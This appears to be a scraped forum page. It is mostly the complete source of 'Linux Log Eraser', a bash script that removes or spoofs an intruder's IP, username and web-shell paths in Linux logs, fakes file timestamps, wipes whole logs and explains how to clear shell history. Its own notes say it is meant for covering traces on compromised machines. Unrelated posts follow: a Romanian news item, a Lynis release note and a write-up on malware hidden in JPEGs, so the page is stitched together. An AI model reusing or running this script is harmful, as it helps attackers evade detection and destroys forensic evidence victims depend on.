Fi8sVrs

LINUX LOG ERASER by b0nd #! /bin/bash # June 2011 clear # A separate file to contain the absolute path for log files. Do edit that per your requirement source log_files.sh # Scroll to the end of code to see the progrom flow # The following arrays would only store the names of the log files found on system # Not making them read-only as they have to be edited later to add in the existing log file names found_ascii_log_files=() found_binary_log_files=() rtr="" # A global variable needed to get array back as a return value from "check_time_stamping" function flag=0 # A global variable to determine whether the back door path has to be deleted or not spoof_user="root" # All the entries for the "user_name" spoofing would be replaced by string "root" in non-ASCII log files # Default banner of the script default_banner () { cat << EOF ############################################################################ Linux Machine Log-Eraser Script Ver 0.3 - Third Release Greetz to: GGGGGG\ GG __GG\ GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\ GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\ GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee | GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____| \GGGGGG |\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\ \______/ \_______|\__| \_______| \____gg | \_______| gg\ gg | gggggg | \______/ Usage: $0 [options] -h help ############################################################################ EOF call_exit } # Help banner of the script. It depicts the usage of various options help_banner () { cat << EOF GGGGGG\ GG __GG\ GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\ GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\ GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee | GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____| \GGGGGG |\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\ \______/ \_______|\__| \_______| \____gg | \_______| gg\ gg | \gggggg | \______/ Usage ===== $0 options OPTIONS: -h help Show this message -i [ip_address] Search for a particular ip_address in all log files and search for top 30 IP's logged in log files -d [ip_address] Delete the ip_address from log files -s [spoof_ip_address] Spoof the IP following -d with the one following -s wherever deletion is not possible -u [user_name] The user name whose logs are to be erased/spoofed -w [web_shell_path] The web back door (e.g. c99) shell absolute path you wish to erase from logs -f fuck logs files To erase all log files completely, not recommended though -e "file extensions" To find other backdoors planted on system -r [web_root_directory] The web root directory to start searching backdoors from Ex: $0 -h * To show this help message Ex: $0 -i 192.168.1.7 * To search 192.168.1.7 in all logs files. Basically finding which logs files have trace of it, and * In addition to that, search all log files (/var/log/*) and show Top 30 most logged IP's in log files. * They could be good choices for spoofing Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker" * To delete lines containing 192.168.1.7 and|or user_name "cracker" from ASCII files, and * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root" Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker" -w "/var/www/xyz.com/uploads/c99.php" * To delete lines containing 192.168.1.7 and|or user_name "cracker" and|or web_shell_path from ASCII files, and * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root" Ex: $0 -f * To erase all log files listed in log_files.sh completely (not recommended) Ex: $0 -e "php txt asp" -r /var/www * To search for probable web backdoors planted on system. Once found, it is recommended to verify the result * The current example searches for files having extensions php or txt or asp in /var/www and subdirectories * Extensions and web_root_directory are customizable [!] Stick to the above OPTION combinations only, else the script might not work properly Author ====== b0nd, b0nd.g4h@gmail.com and www.garage4hackers.com EOF call_exit } # Checking and storing the log files found on system existing_log_files () { for i in ${ascii_log_files[@]} # Accessing all the array entries declared at the top (log_files.sh) do if [ -f $i ]; then found_ascii_log_files[ $j ]=$i # fetching the found log files to our empty array j=$[$j + 1] fi done for i in ${binary_log_files[@]} # Accessing all the array entries declared at the top (log_files.sh) do if [ -f $i ]; then found_binary_log_files[ $j ]=$i # fetching the found log files to our empty array j=$[$j + 1] fi done } # Basic Information which might help user customizing script for the first time search_log_files () { echo -e "\n>>>>>>>>>>>>> Basic Information <<<<<<<<<<<< \n" echo -e "[*] Linux Kernel: `uname -a`" echo -e "\n[*] The various log files found on system (per our script log_files.sh database):" j=0 # following is the call to function to determine the log files found on system existing_log_files echo -e -n "\n\t[*] ASCII Log Files\n" for i in ${found_ascii_log_files[@]} do echo -e "\t\t$i" done echo -e -n "\n\t[*] Binary Log Files\n" for i in ${found_binary_log_files[@]} do echo -e "\t\t$i" done # The following code is to find all the log files containing the IP fetched to parameter -i # e.g. this should be the IP which attacker is willing to find and erase/spoof in log files verify_ip $search_ip # The value for search_ip is obtained from command line arguments (parameter -i) echo -e "\n[*] Searching for IP $search_ip in all non-zip log files (/var/log/*)" # The following won't check the zipped files. # It's affecting the atime value, and nothing has been coded to restamp the atime against this grep command if [[ "`grep -rlw $search_ip /var/log*`" == "" ]] then echo -e "\n\t[*] Cool! The IP $search_ip does not have trace in any log file" else echo -e "\n\t[*] The IP $search_ip has appeared in following log files:" grep -rlw $search_ip /var/log/* | awk ' { print " " $1 } ' fi # The following would check for gz files in /var/log directory. Hard binded for .gz extension. Make it generic if needed have_zgrep=`which zgrep` # It's affecting the atime value, and nothing has been coded to restamp the atime against this zgrep command if [[ "$have_zgrep" == "" ]] then echo -e "\n[*] zgrep could not be found on system" echo -e "\n\t[*] Skipping searching zip files for IP matching. Take care yourself :)" else echo -e "\n[*] zgrep found on system, so checking zip files as well." if [[ "`zgrep -lw $search_ip /var/log/*.gz`" == "" ]] then echo -e "\n\t[*] Cool! The IP $search_ip does not have trace in any zip log file (/var/log/*)" else echo -e "\n\t[*] The IP $search_ip has appeared in following zip log files in /var/log directory:" echo -e "\n\t[*] The script in current form does not edit zip files. Take care of your (|) yourself" zgrep -lw $search_ip /var/log/*.gz | awk ' { print " " $1 } ' fi fi echo -e "\n\t[!] It is recommended to include the above found log files, if not already in the list, in the script (log_files.sh)" echo -e "\t[!] Edit the file log_files.sh per your requirements" # Finding the IP's listed in all log files. The most common IP's could be a good choice for spoofing your original IP # Display Top 20 IP's to make choice from echo -e "\n[*] Displaying top 20 IP addresses found in log files" echo -e "\n\t[*] It is recommended to choose any suitable one among them to spoof your IP" touch tmp-counter.txt local ip_counter=0 echo -e -n "\n\tPlease wait " # It's affecting the atime value, and nothing has been coded to restamp the atime against this grep command # The following grep command would find all the IP look alikes present in all the log files in /var/log/*. # The sort will finally give the uniqe ones for i in $(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/* | grep -i ":" | cut -d ":" -f2 | sort -u) do # The following grep command is same as above but missing the trailing sort -u, hence all the multiple occurence would be listed. # This would help in finding out the occurence of each IP in log files i.e., take one IP from the uniqe list and compare it with # all the IP's in unsorted list, whenever there is a match, that would indicate re-occurence and hence the ip_counter would increase by 1 for j in $(grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' /var/log/* | grep -i ":" | cut -d ":" -f2) do if [[ $i == $j ]] then ip_counter=$[$ip_counter + 1] fi done echo -e -n "." echo "$ip_counter number of times $i has occured in log files" >> tmp-counter.txt ip_counter=0 done echo -e "\n\n\t[*] TOP 20 IP (look alikes) found in log files:\n" cat tmp-counter.txt | sort -g -r | head -n 20 | awk ' { print " " $1 " times -----> " $5 } ' rm tmp-counter.txt call_exit } call_exit () { echo -e "\n[*] Exiting.....\n" #cat << EOF echo -e "\n\t\tWould you mind removing script execution traces from history?" echo -e "\t\t=============================================================" echo -e " ==> http://www.garage4hackers.com/showthread.php?1032-Linux-HISTORY-How-to-avoid-getting-logged\n" # 1. Do not get logged; use the space technique. # # echo \$HISTCONTROL # if the output in not "ignorespace" (without quotes); do # # export HISTCONTROL=ignorespace # Now just give a space in front of any command and it would not be logged in history # 2. Another way of not getting logged: # # history -d \$((HISTCMD-1)) && type_your_command_here_and_execute # e.g # history -d \$((HISTCMD-1)) && whoami # 3. If the script has already been executed without taking precautions, either of the following can be done # to remove the traces: # a) # history -d \$((HISTCMD-2)) && history -d \$((HISTCMD-1)) # The above command would remove the last entry from history. # Executing it couple of times would delete couple of entries # # history # Note down the command number and then execute: # # history -d offset # It would delete the respective entry from history # c) To delete a group of consecutive commands # Let us assume there are 50 commands in history and you wish to delete commands from 30 to 50 # # for i in {51..30}; do history -d "\$i"; done; #EOF exit } fuck_log_files () { # following is the call to function to determine the log files found on system existing_log_files echo "FTW! Erasing all log files" for i in ${found_ascii_log_files[@]} do echo -e "\t[*] Erasing $i..." > $i done for i in ${found_binary_log_files[@]} do echo -e "\t[*] Erasing $i..." > $i done echo "Done!" call_exit } verify_ip () { # First check is to verify that the chars entered as IP are integers # Second check has been made to confirm that only 3 dots are there in IP address # Third check is to mark the valid IP range. The octect value can not be < 0 or > 255 str="$1" # $1 is the first function parameter i.e. IP address here cnt=${#str} # Counting the length of string fetched i.e total chars in IP address, including dots dot_counter=0 for ((i=0; i < cnt; i++)) do char=${str:$i:1} # Reading one character at a time from the input string. Taken from http://www.unix.com/unix-dummies-questions-answers/80215-access-each-character-string.html #code=`printf %s "$char" | od -An -vtu1 | sed 's/^[^1-9]*//'` # copied from http://unix.derkeiler.com/Newsgroups/comp.unix.shell/2004-08/0195.html code=`printf '%d' "'$char"` # Echo the ASCII value of character # The first check if [ $code -lt 48 ] || [ $code -gt 57 ] # Comparing the ASCII value range of Intergers ( 48 - 57 ) then if [ $code -ne 46 ] # To check the "." value then echo -e "\n[*] Err!!! Not a valid IP (some non-integer characters), try again.....\n" call_exit else dot_counter=$[$dot_counter + 1] fi fi done # The second check if [ $dot_counter -ne 3 ] then echo -e "\n[*] Err!!! Not a valid IP (check the number of dots in IP Address), try again.....\n" call_exit fi # The third check # Extract the octets octet_a=`echo $1 | cut -d "." -f1` octet_b=`echo $1 | cut -d "." -f2` octet_c=`echo $1 | cut -d "." -f3` octet_d=`echo $1 | cut -d "." -f4` if [ \( $octet_a -lt 0 -o $octet_a -gt 255 \) -o \( $octet_b -lt 0 -o $octet_b -gt 255 \) -o \( $octet_c -lt 0 -o $octet_c -gt 255 \) -o \( $octet_d -lt 0 -o $octet_d -gt 255 \) ] then echo -e "\n[*] Err!!! Not a valid IP (octet value >=0 and <=255), try again.....\n" call_exit fi } # A function to verify whether the user name fetched to script exists or not # The script will not delete any log line based on user-name "root", else most of the logs would get delete verify_user_name () { local user_name="$1" # $1 is the first function parameter i.e. user-name here if [ $user_name != "root" ] then if [[ `cat /etc/passwd | cut -d ":" -f1 | grep $user_name` != $user_name ]] then echo -e "\t[*] User name does not exist" echo -e "\t[*] Instead of exiting, script will proceed considering you wish to delete logs of some old account which does not exist anymore" else echo -e "\t[*] user_name ($user_name) verified!" fi else echo -e "\t[*] User name is 'root'. Script will still take care not to delete lines based on this user name" echo -e "\t[*] user_name ($user_name) verified!" fi } # A function to obtain the original time stamping of the log file before editing the file check_time_stamping () { echo -e "======================================================================" filename=$1 echo -e "\n[*] Log File Under RADAR: $filename" local atime=`stat -c "%x~%y~%z" ${filename} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` local mtime=`stat -c "%x~%y~%z" ${filename} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` local array=() array=($atime $mtime) rtr=(${array[@]}) # rtr is a global variable } # The function to edit the log files and restore the Time (time stamping) edit_ascii_file_and_timestamping () { for log_file in ${found_ascii_log_files[@]} # It's a global array and declared at the top of code do # Calling check_time_stamping function to get the original time stamps before touching the files echo "inside for loop" check_time_stamping $log_file out=(${rtr[@]}) atime=${out[0]} mtime=${out[1]} echo -e "\n[*] Time Stamping before editing the log file" echo -e "\tatime: $atime" echo -e "\tmtime: $mtime" # Edit only that file which has the desired string/IP in it. Don't touch others unnecessary. # The following if and grep stuff does the same. If found IP in file then edit else don't. Err! haven't followed strictly # -w is needed else if you intend to delete 192.168.1.1, it would delete all 192.168.1.1* as well if grep -qsw "$1" "$log_file" # $1 is the parameter passed to this function, IP in this case then echo -e "\n[*] The IP $1 found in $log_file ... so proceeding editing it" echo "Sleeping for 5 sec" echo -e "\n[*] Editing log file --> $log_file" sleep 5 sed "/$1/d" $log_file > $log_file.new mv $log_file.new $log_file fi if [ $2 != 'root' ] # $2 is the 2nd parameter passed to this function, User name in this case then if grep -qsw "$2" "$log_file" # If user name fetched to script found in log file and that is not 'root' then echo -e "\n\n[*] The username $2 found in $log_file ... so proceeding editing it" echo "Sleeping for 5 sec" echo -e "\n[*] Editing log file --> $log_file" sleep 5 sed "/$2/d" $log_file > $log_file.new mv $log_file.new $log_file fi fi if [ $flag -eq 1 ] # flag=1 states that a web shell path too has to be removed from log files then echo -e "\nflag = 1, Deleting Backdoor Shell PATH: $3" sed -e "s@$3@@g" $log_file > $log_file.new mv $log_file.new $log_file fi # The following time stamping is necessary irrespective of whether the IP was found in file or not. # Because at least the file has been accessed while grep(ing) to search the content # So the atime has to be restored # Restoring mtime as well though with more code it can be skipped if value is not found in log file aatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` amtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` # actime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f3 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\n[*] Time Stamping after editing the log file" echo -e "\tatime: $aatime" echo -e "\tmtime: $amtime" # echo "ctime: $actime" echo -e "\n[*] Restoring the time stamp........." touch -at $atime $log_file touch -mt $mtime $log_file #touch -ct $ctime $log_file aaatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` aamtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` # aactime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f3 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\n[*] Time Stamping after restoring the time stamp" echo -e "\tatime: $aaatime" echo -e "\tmtime: $aamtime" # echo "ctime: $aactime" echo -e "\n======================================================================\n\n" done } edit_binary_file_and_timestamping () { for log_file in ${found_binary_log_files[@]} # It's a global array and declared at the top of code do # Calling check_time_stamping function to get the original time stamps before touching the files check_time_stamping $log_file out=(${rtr[@]}) atime=${out[0]} mtime=${out[1]} # ctime=${out[2]} echo -e "\n[*] Time Stamping before editing the log file" echo -e "\tatime: $atime" echo -e "\tmtime: $mtime" echo -e "\nSpoofing IP $1 in binary log file with IP $2" echo "Sleeping for 5 sec" sleep 5 sed "s/$1/$2/g" $log_file > $log_file.new mv $log_file.new $log_file if [ $3 != 'root' ] then echo -e "\nSpoofing user name..." echo "Sleeping for 5 sec" sleep 5 sed "s/$3/$spoof_user/g" $log_file > $log_file.new # Edit the global variable spoof_user at the top mv $log_file.new $log_file fi # The following time stamping is necessary irrespective of whether the IP was found in file or not. # Because at least the file has been accessed while grep(ing) to search the content # So the atime has to be restored # Restoring mtime as well though with more code it can be skipped if value is not found in log file aatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` amtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\n\nTime Stamping after editing the log file" echo "atime: $aatime" echo "mtime: $amtime" echo -e "\nRestoring the time stamp........." touch -at $atime $log_file touch -mt $mtime $log_file aaatime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f1 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` aamtime=`stat -c "%x~%y~%z" ${log_file} | cut -d "~" -f2 | cut -d "." -f1 | sed 's/-/ /g' | sed 's/:/ /g' | awk 'BEGIN {FS=" "} {print $1$2$3$4$5"."$6}'` echo -e "\nTime Stamping after restoring the time stamp" echo "atime: $aaatime" echo "mtime: $aamtime" echo -e "\n======================================================================\n\n" done } verify_IPs_and_user_name () { echo "[*] Verifying ip_address $ip_to_be_deleted ..." verify_ip $ip_to_be_deleted # Passing the fetched IP as argument to verify_ip function echo -e "\t[*] ip_address ($ip_to_be_deleted) verified!\n" echo -e "\n[*] Verifying spoof_ip_address $spoof_ip ..." verify_ip $spoof_ip # Passing the fetched IP as argument to verify_ip function echo -e "\t[*] spoof_ip_address ($spoof_ip) verified!\n" echo -e "\n[*] Verifying user_name: '$user_name' ..." verify_user_name $user_name } search_web_backdoor_shells () { for extension in ${extension_type[@]} # Now the array already holds the various backdoor extensions fetched do echo -e "\n\t[*] Checking for Extension: $extension" sleep 1 # The following would find and display + outputs the result to a text file grep -RPl --include=*.$extension "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" $web_root_directory | tee -a output.txt | awk ' { print " " $1 } ' done echo -e "\n\t[!] Done! The out put has been stored in output.txt in append mode. Do not forget to delete it.\n" call_exit } lets_begin_the_show () { # Check: If "-e" and "-r", then just find the back door shells and exit if [[ -n $web_root_directory ]] then search_web_backdoor_shells # Check: If non "-e"|"-r" then proceed with deleting logs etc. elif [[ -n $ip_to_be_deleted ]] then verify_IPs_and_user_name if [[ -z $web_shell_path ]] then # Call the function with 2 values; no web shell path has been fetched. No spoofing, just delete the lines. edit_ascii_file_and_timestamping $ip_to_be_deleted $user_name else # Call the function with 3 values; delete web shell path as well. No spoofing, just delete the lines. flag=1 edit_ascii_file_and_timestamping $ip_to_be_deleted $user_name $web_shell_path fi # Call the function to spoof the original IP and user name. No deletion, just spoofing (they being binary files). edit_binary_file_and_timestamping $ip_to_be_deleted $spoof_ip $user_name else echo -e "\nSome issue which I could not catch" call_exit fi } verify_combination_of_command_line_arguments () { # Check 1: None of the argument has been passed if [[ -z $ip_to_be_deleted ]] && [[ -z $spoof_ip ]] && [[ -z $user_name ]] && [[ -z $extension_type ]] && [[ -z $web_root_directory ]] then echo -e "\n[*] Error! None of the required argument has been passed" default_banner call_exit fi # Check 2: Nothing should be passed in combination with "-e" and "-r" if ( [[ -n $extension_type ]] || [[ -n $web_root_directory ]] ) && ( [[ -n $web_shell_path ]] || [[ -n $ip_to_be_deleted ]] || [[ -n $spoof_ip ]] || [[ -n $user_name ]] || [[ -n $web_shell_path ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Do not mix -e and -r with any other flag!" default_banner call_exit fi # Check 3: "-e" and "-r" shall be together if ( [[ -n $extension_type ]] && [[ -z $web_root_directory ]] ) || ( [[ -z $extension_type ]] && [[ -n $web_root_directory ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[*] -e and -r must be specified together and must be non-empty!" default_banner call_exit fi # Check 4: If one of the following, the first one, is stated then rest must be if [[ -n $ip_to_be_deleted ]] && ( [[ -z $spoof_ip ]] || [[ -z $user_name ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -s and -u when -d specified!" default_banner call_exit fi # Check 5: If one of the following, the first one, is stated then rest must be if [[ -n $spoof_ip ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $user_name ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -d and -u when -s specified!" default_banner call_exit fi # Check 6: If one of the following, the first one, is stated then rest must be if [[ -n $user_name ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $spoof_ip ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -d and -s when -u specified!" default_banner call_exit fi # Check 7: If first one is stated, then rest must be if [[ -n $web_shell_path ]] && ( [[ -z $ip_to_be_deleted ]] || [[ -z $spoof_ip ]] || [[ -z $user_name ]] ) then echo -e "\n[*] Error! Improper number of arguments passed" echo -e "\n[-] Include -d, -s and -u when -w specified!" default_banner call_exit fi } # ---------------------------------------- The program execution starts from here ------------------------------- #### Checking UID and EUID value #### #### Only allow root to execute this script as non-root might not have write access to log files if [ "$UID" != "0" ] then if [ "$EUID" != "0" ] then echo -e "\n[*] Cannot run script: Permission denied." "Please be root to use this script". call_exit fi fi #### Show default_banner if no argument has been passed if [ $# -eq 0 ] then default_banner fi # Following variables are for the command line arguments search_ip= ip_to_be_deleted= spoof_ip= user_name= web_shell_path= extension= # This one to handle the multiple extensions give to grep from command prompt web_root_directory= extension_type=() # This array will hold the multiple extensions j=0 while getopts ":hi:fd:s:u:w:e:r:" option do case $option in h) help_banner ;; i) search_ip=$OPTARG search_log_files ;; f) fuck_log_files ;; d) ip_to_be_deleted=$OPTARG # All the verifications would be done later once combination of command line arguments have been verified ;; s) spoof_ip=$OPTARG # Same as above ;; u) user_name=$OPTARG # Same as above ;; w) web_shell_path=$OPTARG echo "WEB-SHELL-PATH: $web_shell_path" # No verification could be done for it ;; e) for extension in $OPTARG do extension_type[ $j ]=$extension # Holding multiple extensions passed at command line j=$[$j + 1] done ;; r) web_root_directory=$OPTARG echo -e "\t[*] Web-Root Directory: $web_root_directory" ;; ?) echo -e "\n[*] Wrong argument passed" default_banner ;; esac done # Call to following function to verify the combination of command line arguments passed to script verify_combination_of_command_line_arguments # Following function call is necessary in order to find the available log files on system existing_log_files # Following function call would be made only after all the mandatory arguments have been passed to the script lets_begin_the_show Log File: ####################### # Declaration of two arrays containing the absolute path of log files. Add in more path per your requirements # Since declared outside any function, they are global # declare -r makes our array read-only and could not be altered anywhere in the code following the declaration ####################### # Those logs files which keep entries for IP address, web path accessed etc. Basically the ASCII log files. declare -r ascii_log_files=( #'/var/log/syslog' #'/var/log/messages' #'/var/log/httpd/access_log' #'/var/log/httpd/error_log' #'/var/log/xferlog' #'/var/log/secure' #'/var/log/auth.log' #'/var/log/user.log' # Check syslog.conf for more log files # Enter more log files here ) # Those logs files which keep user activity logs. Basically the non-ASCII log files. declare -r binary_log_files=( #'/var/log/wtmp' #'/var/log/lastlog' #'/var/log/btmp' #'/var/run/utmp' # Enter more log files here ) Usage: Linux Log Eraser ================ Linux Log Eraser is a bash script which erases almost all your logs from the log files on a Linux machine. This can be useful for an attacker to wipe out the traces before logging out of the compromised Linux machine. Usage ===== $0 options OPTIONS: -h help Show this message -i [ip_address] Search for a particular ip_address in all log files and search for top 30 IP's logged in log files -d [ip_address] Delete the ip_address from log files -s [spoof_ip_address] Spoof the IP following -d with the one following -s wherever deletion is not possible -u [user_name] The user name whose logs are to be erased/spoofed -w [web_shell_path] The web back door (e.g. c99) shell absolute path you wish to erase from logs -f fuck logs files To erase all log files completely, not recommended though -e "file extensions" To find other backdoors planted on system -r [web_root_directory] The web root directory to start searching backdoors from Ex: $0 -h * To show this help message Ex: $0 -i 192.168.1.7 * To search 192.168.1.7 in all logs files. Basically finding which logs files have trace of it, and * In addition to that, search all log files (/var/log/*) and show Top 20 most logged IP's in log files. * They could be good choices for spoofing Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker" * To delete lines containing 192.168.1.7 and|or user_name "cracker" from ASCII files, and * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root" Ex: $0 -d 192.168.1.7 -s 10.1.1.7 -u "cracker" -w "/var/www/xyz.com/uploads/c99.php" * To delete lines containing 192.168.1.7 and|or user_name "cracker" and|or web_shell_path from ASCII files, and * To spoof 192.168.1.7 in non-ASCII files by 10.1.1.7 and user_name "cracker" by "root" Ex: $0 -f * To erase all log files listed in log_files.sh completely (not recommended) Ex: $0 -e "php txt asp" -r /var/www * To search for probable web backdoors planted on system. Once found, it is recommended to verify the result * The current example searches for files having extensions php or txt or asp in /var/www and subdirectories * Extensions and web_root_directory are customizable [!] Stick to the above OPTION combinations only, else the script might not work properly Author ====== b0nd, b0nd.g4h@gmail.com and www.garage4hackers.com Customizing the script while executing for the first time on target: ==================================================================== 1. Upload both, the linux_log_eraser.sh and log_files.sh on target server 2. Fire the linux_log_eraser script. Take care that you must be root (either UID=0 or EUID=0) to execute the script 3. Use parameter -i, and pass the IP address you are worried about in log files: ./linux_log_eraser -i 192.168.1.1 4. The above command will scan all the log files for that particular IP and will let you know all the log files having trace of that IP 5. Open up log_files.sh file. Cross check which log file, reported in step 4, is not in the list. Do add the log file/files 6. Running the step 3 command would also let you know the top 20 IP's in the log files having most occurrences 7. Choose any suitable IP from the top 20 IP's as a spoof IP.....and you are ready to proceed with other options of script Logic: ====== Some log files are Ascii types, hence can be read and edited easily. Rest log files are binary types and are hard to read and edit directly. For ascii files, all the lines in various log files containing either of the following would be deleted: 1. The IP following -d parameter 2. User name following -u parameter (if it is other than root). Since the user 'root' has many entries, so to remain stealty it's better not to delete such lines. 3. Web shell path of your backdoor following -w parameter. For binary files, all the entries for your IP and user name (if it is other than root) would be spoofed (not deleted) IP would be spoofed to the Spoof IP provided and user name would be spoofed to "root" Pass the following to script: 1. The IP which you wish to delete/spoof in log files 2. The spoof IP. This would be the IP to replace the IP in binary log files 3. The user name you wish to delete/spoof in log files 4. Absolute web shell path to erase it's entries from log files (e.g. the web back doors) For spoofing in binary files, better analyze the files manually first and choose a good IP and user name You can do the following for binary file analysis: For wtmp: #last (shows: username, terminal, IP) #strings /var/log/wtmp (shows: username, terminal, IP) For utmp: #who (shows: username, terminal, IP) #strings /var/run/utmp (shows: username, terminal, IP) For lastlog: #lastlog (shows: username, terminal, IP) #strings /var/log/lastlog (shows: terminal, IP) For btmp (if exists): #lastb (shows: username) #strings /var/log/btmp (shows: username) Correct me if the logic is wrong at any place except for "/var/log/lastlog"

Chromium Blog: Show off your security skills: announcing Pwnium 4 targeting Chrome OS

citeste asta https://rstforums.com/forum/67118-sfaturi-raport-de-vulnerabilitate.rst#post433560

Poli?i?tii din cel mai nordic ora? din Pennsylvania, Freeland, au dat „Like” pe Facebook la cea mai interesant? postarea din cariera lor, de când a ap?rut re?euau de socializare a lui Mark Zuckerberg. Anthony Lescowitch, în vârst? de 35 de ani, poate intra în Cartea Recordurilor la categoria „cel mai prost fugar urm?rit penal”. La începutul acestei s?pt?mâni, acesta a dat „share” la postarea poli?iei cu poza sa ?i anun?ul c? este urm?rit. Poli?i?tii au observat acest lucru ?i în doar câteva minute au reu?it s?-l localizeze ?i s?-l prind?. Cum s-a întâmplat asta? Un ofi?er de poli?ie ?i-a creat un cont fals pe Facebook ?i s-a dat drept „o femeie atractiv?”. Din vorba în vorb?, Lescowitch a acceptat s? se întâlneasc? cu „femeia” la o ?igar?. B?rbatul, c?utat pentru agresiune fizic? foarte grav? asupra unei persoane, a venit cu un pachet de ?ig?ri, iar „domni?oara” cu ni?te c?tu?e, potrivit usatoday.com. Dup? ce l-au ridicat, poli?ia a postat un mesaj pe Facebook: „PRINS!!! A redistribuit postarea noastr? despre urm?rirea lui ?i a fost prins 45 de minute mai târziu!” via Yahoo! News

Mata-i grasa

Firefox > Preferences > Privacy > History: "No save history"

Update Lynis Auditing Tool 1.3.6 Changes: This release added many new features, including an extension of support for *BSD systems like DragonFly BSD, FreeBSD, NetBSD, and OpenBSD. New support was provided for elementary OS (Luna) along with several new Apache tests, OSSEC, and the dntpd time daemon. New functions have been added to compact the code and simplify development. Smaller bugs have been fixed. Logging and reporting was extended, the man page updated, and screen display improved. Under the hood minor adjustments have been made to support systems which are slightly different, such as those missing the dig binary. Download: Lynis Auditing Tool 1.3.6 ? Packet Storm

Security researchers at TrenMicro have identified a new type of malware that update their configuration in a very interesting way. This means that compromised machines are configured to download JPEG files that contain encrypted configuration files/binaries without victim’s knowledge. The image is hosted on web server located in Asia-Pacific region and contains three types of settings: configuration file (Type A) configuration file (Type binary content (either DLL or EXE files) The first type of configuration is the standard C&C settings where it allows attacker to send instruction to victim machines and customize the hosts or update the malware to use another type of configuration. This technique makes the botnet resist in case of functionality issue. The second configuration file is containing several process names for antimalwares and hostnames of the compromised network. JPEG images may not only include configurations but it also host a binary content that allows malware authors to update the malicious software packages at any moment. The way that cyber-criminal are hiding their activities is becoming more and more complex to not identify their network and techniques. Hosting a malicious image on web server is hard to detect with the security software. This makes the attack more resilient and not spotted by security software. JPEG files used by attacker to host configuration and binaries for the Malware TrendMicro also revealed that reversing the images allowed to identify hostnames and IP addresses of infected machine’s/networks, list of images used in the cyber attack that is accessed by the malware beside the operating system version installed on infected machines. Via Image Hosted on Web Server Serving Malware | SecTechno

